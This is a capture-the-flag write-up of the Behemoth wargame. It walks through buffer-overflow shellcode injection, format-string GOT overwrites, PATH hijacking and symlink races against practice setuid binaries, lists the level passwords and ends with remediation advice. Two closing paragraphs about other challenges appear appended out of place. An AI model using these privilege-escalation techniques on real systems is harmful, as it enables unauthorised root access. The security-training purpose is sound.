This report can be read both on this site, and as its original report form. It is highly recommended that you read the original report form instead because it is better formatted.
Behemoth
A look into the exploitation of vulnerable binaries
In contrast to Narnia, the source code for each binary is not given. Nevertheless, all eight binaries were successfully analyzed and exploited. Attack techniques such as shellcode injection, format string exploitation, and path privilege escalation are covered in this report. Some binaries were more of a reverse engineering exercise (Behemoth 5 and Behemoth 6 for example) while others typically involved buffer overflow and format string exploits such as in Behemoth 7, a challenge which showcases an interesting way of bypassing shellcode filters.
The binaries were mainly vulnerable due to a lack of boundary checks and input validation. It is critical that the SETUID bits of these binaries are removed until the remedies in the Conclusion section are observed. Below is the full listing of all passwords obtained from the compromised users:
Username
Password
behemoth0
behemoth0
behemoth1
aesebootiv
behemoth2
eimahquuof
behemoth3
nieteidiel
behemoth4
ietheishei
behemoth5
aizeeshing
behemoth6
mayiroeche
behemoth7
baquoxuafo
behemoth8
pheewij7Ae
Attack Narrative
The credentials to the first user, behemoth0, was given as behemoth0 (the credentials are behemoth0:behemoth0). The ssh service is open on port 2221, and this ssh session provided the means for allowing the analysis of the binaries discussed in this report.
Behemoth 0
Running the strings command on the binary reveals some interesting strings:
However, trying any of these potential passwords results in an “Access denied..” message. Using ltrace, a library call tracer, the system calls of the binary can be seen upon inputting a password:
The binary is comparing the user input to the secret password by using the strcmp (string compare) function. Trying out the eatmyshorts password, we are given access to the next level:
Behemoth 1
Now with a shell as the behemoth1 user, we can maintain persistence by grabbing the password from /etc/behemoth_pass directory.
Running the behemoth1 binary, the following output can be seen:
After downloading the binary and using ltrace, the following output is found:
This binary is a little bit more secure in the sense that the password is not exposed by the strcmp function. Before trying to reverse engineer this binary, it is important to check for possible buffer overflow vulnerabilities. This can be done by sending a large input as follows:
The program was successfully crashed by sending a large input as can be seen from the “Segmentation fault” error. This is a strong indicator of a potential buffer overflow vulnerability.
Note how the cyclic function was used to help determine where the offset is
The output confirms the suspicion that this binary is vulnerable to a buffer overflow attack. Looking at the return address at the bottom of the result, it can be seen that the binary is looking for an address of 0x61617361. The offset can be calculated using the cyclic -l operation as follows:
The offset is the amount of bytes that a binary can take before overwriting the instruction pointer (the register which points to which part of the code should be executed next). Observe from the hex addresses that this is a 32 bit binary. The file command can be used as well to verify this:
This binary is not stripped meaning the debug symbols[1] of the binary can be gathered. Additionally, the binary’s security can be analyzed with the checksec command:
Seeing as this binary has NX (non-execute) disabed, shellcode can be written into memory and the binary will execute it (provided that the payload is formatted correctly). With the knowledge that arbitrary code can be executed and that the instruction pointer can be controlled, the binary can be exploited by using shellcode.
Note how the return address was successfully controlled (42 is the hex value for B).
For the sake of learning more about binary exploitation, I will go over two different methods of pwning:
Method 1
We can create a payload that has the following structure:
Then this payload can be inputted to the binary and it will execute the shellcode. There are many different kinds of shellcodes that can be used, however a simple /bin/sh shellcode[2], which will return a shell upon execution. The next task is to determine where the address of the shellcode will be.
POC
Note A is 41, B is 42, and C is 43 in hex
Looking at the output of the esp register, the register responsible for pointing to the top of the stack, observe that the shellcode (in this case 43) will start at the second column of 0xffffd03c. Thus the address of the shellcode will be 0xffffd03c + 4 (each column corresponds to 4 bytes) which equals 0xffffd040.
Shellcode Execution
With the knowledge of how buffer overflow attacks work, we can now continue with exploiting the behemoth binary on the target system.
Now that the binary’s memory has been flooded, the ESP register can be checked to see which address marks the start of the shellcode:
The value for the eip register can be found at 0xffffd5bc. It is then followed by a sequence of NOPs. The shellcode is most likely the one at 0xffffd61c + 8. Thus, the return address will most likely work if given a value between 0xffffd5bc + 4 and 0xffffd61c + 8.
It is imperative to note that upon piping this malicious payload into the binary, we did not receive a Segmentation Fault error, rather an Illegal Instruction error was printed out. This error is present whenever a program jumps to an address with code that cannot be interpreted either because it is plain data or is an ambiguous part of an opcode (that’s why this error is also called an illegal opcode error). This is an indication that our payload most likely works, however the return address needs to be tweaked so as to point to an address in memory that will correctly interpret our shellcode. After tweaking with the address for a bit by slightly decrementing it, the following is found:
Note how now there is no error displayed
The program is most likely executing the shellcode, but a shell was not received. This is most likely due to the stdin and stdout being tied to this process. By appending ;cat - to the end of the command to output stdin, the exploit works as intended:
Method 2
Alternatively, it is possible to exploit this binary by using environment variables.
We can create a c file which will take our environment variable to use for the targeted binary.
After compiling the program with gcc, the program can be executed so as to inject the shellcode into the environment variable, and find where it is located in memory:
Seeing that the shellcode is at 0xffffddd3,the payload can be constructed to point to this address:
Behemoth 2
As the behemoth2 user, the behemoth2 binary can now be executed.
Binary Analysis
Behavior
After executing the binary, the program simply touches a file and then hangs:
Seeing as this binary performs a system function, there is most likely a system function being called within the program.
Ghidra
After downloading the binary onto the attack box, this binary can be further analyzed within Ghidra:
Toward the top of the program, the sprintf function is called in which the string “touch %d” is passed into the local_2c variable (with %d corresponding to the id of this process). It is essential to note that touch is declared without using its full path (i.e. /usr/bin/touch).
Furthermore, two system calls are executed. One is within the if statement and one is outside the if statement following a sleep of 2000 seconds. This sleep call is responsible for the hanging that was experienced after executing the binary. Therefore, the first system call is to the touch command. The second system call again uses the local_2c variable, but only after it is initialized to 0x20746163. Converting 20 74 61 63 into ascii results in “ tac”.
Seeing as this binary is in LSB format, the “ tac” string should actually be read backwards, revealing that this is “cat “. Thus, the program first touches the a file then cats it after 2000 seconds.
Binary Exploitation
This binary has multiple vulnerabilities, and each method of exploitation is described below:
Path Privesc (Touch)
Seeing as this binary executes the touch command without using its full path, a file called touch can be created which executes the /bin/bash command:
After creating this file with the aforementioned contents, the PATH environment variable can be updated to prioritize the current directory over all other directories:
Now, upon executing the behemoth2 binary, the touch command will be called to the newly created touch file:
Path Privesc (Cat)
The same methodology used for the touch command can be used for the cat command. As seen from the analysis, the cat command is also being called without using its full path:
This way of escalating privileges takes longer than the aforementioned one because a wait of 2000 seconds is necessary before cat gets executed.
Symbolic Link
This binary could still be abused even if the cat and touch commands were executed using their full paths. A symbolic link to the behemoth3 password file can be created so that the cat command reads the password of the behemoth3 user. The name of the file must correspond to the id of the process. When the cat command reads the contents of the created file, it will be pointed to the credentials of behemoth3, and the password of the user would be printed to stdout:
Once the behemoth2 binary was executed, an error occurred stating that the file 10216 was attempted to be created, but the behemoth3 user does not have the permissions to create this file under a directory owned by behemoth2. The name of the file is leaked, meaning that a symbolic link named after this file can be created before the cat command gets executed (the time limit for creating this file is 2000 seconds).
After logging into another session as the behemoth2 user, a symbolic link corresponding to 10216 can be created:
Note that this file is pointing to the password of the behemoth3 user.
After waiting for 2000 seconds, the password of the behemoth3 user gets printed out:
Behemoth 3
After successfully abusing the behemoth2 binary, the next challenge is behemoth3.
Binary Analysis
We can begin the analysis by downloading the target binary on the attack box and running the checksec command against it:
From the results of checksec and file, note that the binary essentially has no protection on it. Everything that could possibly hinder debug analysis on the program is disabled. Additionally, the file is not stripped, so debug symbols will be available.
Behavior
When executing the program, we are asked to provide an identification:
After inputting a large amount of A’s (in this example 500 A’s were used), the program prints out a minimized version of the string:
Despite 500 A’s being passed into the buffer, only 200 A’s were printed out. Ghidra can be implemented to further help in understanding how this binary is working:
Ghidra
Ghidra translated the assembly code of the main function into the following:
A variable called local_cc of type char is declared and is allocated 200 bytes. Afterwards, the fgets function is used to allow up to 200 bytes to be passed to the local_cc variable, and therefore this binary is not vulnerable to a buffer overflow exploit. However, the user input (local_cc) is passed directly to the printf function without any sort of sanitization. Consequently, the program is likely vulnerable to a string format exploit[3].
Discovery of Format String Vulnerability
This can be verified by passing a format string into the local_cc variable:
Despite inputting %x into the buffer, an output of a7825 was printed (note that %x is a format string to specify an unsigned int as a hexadecimal number[4]). When the binary is given a format string as an input, it starts to leak memory from the stack.
This vulnerability can be abused to overwrite memory by using the %n format string which writes the number of characters written into a pointer parameter. If the pointer parameter is an address that the binary uses, then the memory address of the function can be overwritten to point to shellcode. This can result in the execution of arbitrary code.
Memory Addresses of Useful Functions
The objdump command can be utilized to determine the addresses of functions used by the binary:
From the output, there are a total of three functions displayed (printf, fgets, and puts). However, the fgets and printf functions should not be overwritten, as these functions must work properly to accept the malicious payload. This leaves the puts function as the only candidate from the objdump output to be overwritten.
Overwriting Puts
Before being able to overwrite the memory address of puts, the user input’s location within the stack must first be determined:
When inputting AAAA followed by a %x format string, the hexadecimal values of the A’s are immediately printed. This means that the user input is in the first parameter within the stack. Throughout this level, the malicious input will be directed to a file so that the payload can be constructed with the help of GDB:
Constructing Payload With GDB
Using the address of puts found by the objdump command, the following payload can be constructed:
The xacx97x04x08 string corresponds to the address of the puts function in little endian form (0x080497ac). Following this, the hex output of this string is printed out with a padding of 100 0’s. This type of padding is extremely useful for controlling the value of the memory address of whatever is being overwritten.
When this payload is inputted into the binary within GDB, a segmentation fault occurs, however the address of the puts function does not follow an expected value:
Observe that the address is x08048356 instead of a low value. To be exact, the value should be equal to the number of characters that are in the payload. This would mean that the value should be 4 (for the address of puts) + 100 (hex formatter) which is 104 in decimal and 0x68 in hex. Prepending AAAA to the beginning of the payload successfully overwrites the puts function:
Exploit Development
With the successful overwrite of the puts function, the next step is to control the address that it points to. Currently, it points to 0x6c, but this value must be changed to point to shellcode in order for the successful execution of arbitrary code. The particular methodology used to develop this exploit will work on the basis of overwriting the puts function address two bytes at a time. Thus, the final exploit will look like the following:
Note that there are two addresses within this payload: one is the base address of the puts function, and the other is the puts address + 2 to accommodate for overwriting the address two bytes at a time. This will also mean that two %x strings must be used along with two %n’s. Additionally, a shellcode[5] of 23 bytes will be used.
Controlling Puts Address
To begin the exploit, the puts address must first be controlled with the help of format string padding.
A NOP sled of 100 bytes is used before the shellcode of 23 bytes (denoted by the placeholder ‘S’) is declared. Following the shellcode is a padding of 100 bytes to the hex format specifier which results in the puts address of 0xef when executed:
A segmentation fault occurred as expected, because the puts address points to a memory address that it cannot access. Ideally, the puts function should point to an address somewhere within the nop sled. Seeing as the nop sled consists of 100 bytes, there are multiple addresses that would work for this exploit:
The exploit begins at address 0xffffd4d8 + 8 (as can be seen from 0x41414141 which is AAAA) followed by the address of puts and another string of four A’s. This is then followed by puts + 2, and finally the nop sled begins at 0xffffd4e8 + 8. For the purposes of this exploit, a memory address of 0xffffd518 was chosen. Note how this value in decimal is 4294956312 which theoretically could be obtained by passing in an exploit that is about 4294956312 bytes long. In reality, however, this would cause a memory overload (and even if it didn’t, printing this many bytes to stdout would take a long time). As mentioned in Exploit Development, this can be bypassed by passing two %n format specifiers which point to two different points in memory whose addresses are two bytes apart.
The largest value for each part of the memory address when split into two is 16^4 - 1 which is 65535. This largely reduces the 4294956312 length previously mentioned. Incidentally, the largest value possible for a 32 bit binary is 16^8 - 1 which is 4294967295 or 0xffffffff.
A value of 0xef was written to the puts function address; however, a value of 0xd510 (for the lower two bytes) was desired. The padding necessary for achieving this value can be determined through the following calculation:
desired_output - current_output + current_padding
Thus, a padding of 54405 is needed to output 0xd510:
The lower two bytes were successfully overwritten to 0xd510. The same method can be used to overwrite the two most significant bytes:
Note that a padding of 100 was arbitrarily picked so as to perform the following calculations:
After inputting a padding of 100 bytes for the two most significant bytes, the subsequent value was determined to be 0xd574:
The correct padding can subsequently be calculated:
Therefore, the final exploit will look like the following:
Popping a Shell
Note that the S was also changed to the actual shellcode. Executing this payload within GDB causes the debug process to abruptly exit due to the execution of /bin/dash:
When this payload is piped straight into the binary without GDB, a shell is returned:
Note that cat - is appended to the end of the payload. This is an essential part of the exploit which allows the process to interact between stdin and stdout. Without cat, the process immediately exits without errors.
Incidentally, when first performing the exploit of this binary, a /bin/bash shellcode[6] was used, however it did not work outside GDB for unknown reasons. When a binary exploitation does not work as intended, it could be beneficial to use a different shellcode to see if it resolves the problem.
Behemoth 4
With the necessary permissions obtained by compromising the behemoth4 user, the behemoth4 binary can be executed.
Binary Analysis
Before being able to exploit the binary, it is necessary to understand how it works first.
Behavior
Executing the binary does not result in anything out of the ordinary:
The program simply prints out “PID not found!” and exits immediately.
Ghidra
Within Ghidra, we can get a further look at how the program is getting the PID, and what it does with it:
The program starts by declaring a couple of variables. The getpid function is called, and local_14 is set to equal its output. This output is then concatenated with /tmp, and local_30 is set to equal it. Afterwards, the local_18 variable is set to equal the output when opening a file in /tmp whose name corresponds to the id of the binary’s process (which is local_30). If the file does not exist, then “PID not found!” is printed out. Otherwise, the contents of the file is read out by using the getchar function within a while loop.
Binary Exploitation
The problem with this program is that it assumes that it can only read files within the /tmp directory. However, symbolic links can be used to make the program read the password file of the behemoth5 user.
Symbolic Link Attack
Seeing as the pid of the binary cannot be easily determined before executing the program, a bash script can be utilized to create many files that correspond to possible PIDs. Before creating this bash script, the approximate PID of the binary must first be found:
This process was assigned to the ID of 22928, and it therefore looked for a file called 22928 within the /tmp directory. The PID upon the next execution of the binary must be greater than 22928 but likely less than 30000:
Now, when the binary is executed, it will read the contents of behemoth5’s password:
Behemoth 5
By first logging into the account through ssh with the credentials found in Behemoth 4, the behemoth5 binary can be executed.
Binary Analysis
When executing the binary, nothing out of the ordinary occurs. The binary simply exits without anything printing out to stdout. After downloading the binary onto the attack box, Ghidra could be utilized to help in analyzing the binary.
Ghidra
After many different variables are declared, the password for the behemoth6 user is read into the program. Afterwards, the gethostbyaddressname function is called with the argument “localhost”. Shortly afterwards, the socket function is called using the arguments (2,2,0). Observe the following code and the corresponding Ghidra output:
Source1:
Ghidra1:
Source2:
Ghidra2:
Source3:
Ghidra3:
The socket arguments of Ghidra3 are identical to the arguments seen from behemoth5. Therefore, the arguments seen in the behemoth5 binary correspond to iPv4, UDP, and default protocol respectively[7].
Following the calling of the socket function, iVar3 is set to be 1337 before a sendto function is called. From these lines of code, it can be discerned that a UDP socket is opened on port 1337, and the password of the behemoth6 user is sent to it.
Catching Behemoth6 Password Through UDP
Before executing the binary, it is essential that another session be opened so that a UDP listener can be set up on port 1337:
behemoth5@behemoth:~$ nc -lup 1337 localhost
The -u flag specifies UDP mode, -p is for specifying a port, and -l tells nc to listen for inbound connections
After executing the binary, the password of the behemoth6 user can be seen on stdout:
Note that the blue line is a result of using tmux[8], and it represents the delimiter between different sessions
This challenge was more of a reverse engineering exercise, but it is good practice for developing the skill of understanding the functionality of a binary.
Behemoth 6
After logging in as the behemoth6 user and executing the behemoth6 binary, the following output is seen:
Furthermore, performing the ls command on the /behemoth directory reveals another interesting file possibly related to behemoth6:
Namely, that file is called behmoth6_reader and it might be used by the behemoth6 binary. After downloading the binary onto the attack box, the binary can be analyzed with the help of Ghidra.
Ghidra
Ghidra translated the assembly code found for each binary into the following:
The code on the left was produced by the behemoth6 binary, while the code on the right is from the behemoth_reader. Looking at the code for the bhemeoth6_reader program, a file named shellcode.txt is expected. However, the contents of this file are not printed out anywhere. If a file named shellcode.txt exists, then a small sanitization is performed against the file: if the 0xb byte exists within the file, then the program immediately exits.
In short, the program is executing the contents of the shellcode.txt file as machine code. Therefore, shellcode will get executed by the binary. This, however, will not directly result in a privileged shell due to the fact that the SETUID bit is not enabled on the behemoth6_reader binary. Rather, the behemoth6 binary has the SETUID bit, and its interaction with the behemoth6_reader will determine the significance of the shellcode.
Looking at the code for behemoth6, observe that the file is opened using the popen function in read mode, after which the output is passed into the __stream variable. This variable then gets passed into __s1 which is compared against the string ‘HelloKitty’ in the strcmp function. If the contents of this variable matches the string, then a /bin/sh shell is returned.
Abusing popen()
The output of the popen function is determined by the behemoth6_reader. Consequently, if the behemoth6_reader executes shellcode that makes it print out ‘HelloKitty’, then a shell will be returned. There are already shellcodes online that perform this operation, and the following shellcode was used[9]:
The code above prints out whatever string follows it (however the string must be in machine code). This code, coupled with a subsequent string in shellcode will result in a successful.string comparison. To facilitate the conversion between ascii and shellcode, a conversion table[10] was used.
Ascii:
HelloKitty
Shellcode:
x48x65x6cx6cx6fx4bx69x74x74x79
After creating a directory in /tmp (so as to be able to create files), the following code was printed into shellcode.txt:
Now when executing the behemoth6 binary, the shellcode file will be called when the behemoth6_reader is executed via the popen function, subsequently making the reader print out HelloKitty. This will cause the strcmp function to run true, and a /bin/sh shell is subsequently returned:
Behemoth 7
After successfully exploiting the behemoth6 binary, we are left with the final challenge of exploiting the behemoth7 binary.
Binary Analysis
Before analysing the binary within tools such as GDB and Ghidra, it is advised to first start by executing the binary to observe its behavior.
Behavior
Upon executing the binary, nothing conspicuous occurs. The binary immediately exits after execution without printing anything to stdout.
Ghidra
After downloading the binary onto the attack box, the binary can be analyzed with the help of Ghidra. Using Ghidra, the assembly code of the binary was converted to the following code:
At the very top of the code, it can be seen that the main function takes three parameters. These parameters most likely correspond to the input given by argc[11]. At the top of the main function are declarations of variables, and among them is local_210 with 512 bytes allocated to it. Toward the middle of the main function is a while loop located within an if statement. Inside of the while loop is an if statement which, upon running true, prints the following:
Therefore, it is likely there is a filter on non alphanumeric characters[12]. This could limit the possible shellcode that could be used if the EIP register cannot be overwritten. However, looking at the code, there does not seem to be any boundary checks, and the EIP register should capable of being overwritten. This can be verified by inputting a large number of bytes into the program:
The EIP register was successfully overwritten as can be seen by the value of the instruction pointer (0x41414141), which is AAAA in hex. Therefore, the shellcode that will be used for exploiting this binary does not have to be made of alphanumeric characters.
Constructing Payload
The payload will consist of the necessary amount of bytes to equal the EIP offset, followed by the address of the shellcode, after which the NOP sled will be declared which precedes the shellcode.
Calculating EIP Offset
To begin the construction of the exploit, the EIP offset must first be calculated:
The offset was calculated as 528 bytes, and as such 528 bytes of junk must first be inputted into the binary before the EIP register can be controlled.
Shellcode Address
The next step is to determine the address of the shellcode[13]. This can easily be analyzed within GDB:
The junk after the EIP begins at 0xffffd2e8 + 8 which is 0xffffd2f0. Following the junk bytes is the shellcode at 0xffffd358 + 8 which is equivalent to 0xffffd360. Therefore the EIP value should be overwritten to point to f 0xffffd360.
Final Payload
With the knowledge of the EIP offset and the shellcode address, the final payload can now be constructed:
It is important to note that the repetition of ‘A’ 112 times was chosen so as to not spill 0x41 into the shellcode portion of memory. This value of 112 is not necessary, but it should be a multiple of 4 to prevent spilling into memory addresses that only shellcode should occupy.
The payload works in GDB as can be seen from /bin/bash being executed:
When trying this payload outside of GDB, a shell is successfully popped, and the final local user is compromised:
Conclusion
Every binary tested was successfully exploited. Many binaries which in practice should not be vulnerable, turned out to be exploitable due to the calling of sensitive system commands (in particular /bin/sh). This resulted in the horizontal privilege escalation in Behemoth 0 and Behemoth 6.
There were multiple different vulnerabilities associated with each binary, running from format string exploits to buffer overflows and privilege escalation via the PATH environment variable.The following remediations should strongly be considered:
Perform boundary checks on user input
Multiple binaries were vulnerable due to the lack of boundary checks
Shellcode injection was possible on many binaries due to this lack of validation
Bad shellcode filtering can be bypassed if EIP can be overwritten as can be seen in Behemoth 7
Filter user input
Malicious shellcode could easily be injected in multiple binaries due to the lack of user input validation (although shellcode could be encoded, this would nevertheless mitigate these kind of attacks)
Never run sensitive system commands unless absolutely necessary
System commands such as /bin/sh should rarely ever be called (especially within a SETUID binary) due to its insecurity
Binaries that should not have been vulnerable turned out to be exploitable due to calling /bin/sh
Always use the full path of a command
PATH environment variable attacks were present on Behemoth 2
Never read files that can be created by an untrusted user
Symbolic links can be used to exploit this vulnerability as can be seen in Behemoth 2 and Behemoth 4
This challenge was about exploiting a binary via a return-to-libc attack (due to the enabled NX bit). The address of printf was provided to faciliate exploitation, however it was only given after passing in user input. This address could not be used for future execution of the binary due to the presence of ASLR. Nevertheless, despite the presence of the enabled NX bit and ASLR, the binary was vulnerable.
scanf() is a function that is widely used in C programs. This binary, which is seemingly secure, made subtle but dangerous programming mistakes that resulted in a security hole through which a user can manipulate memory. Since this binary is dynamically linked, overwriting the GOT entry subsequently forces the program to jump to memory of the attacker’s choice when the manipulated function pointer gets called.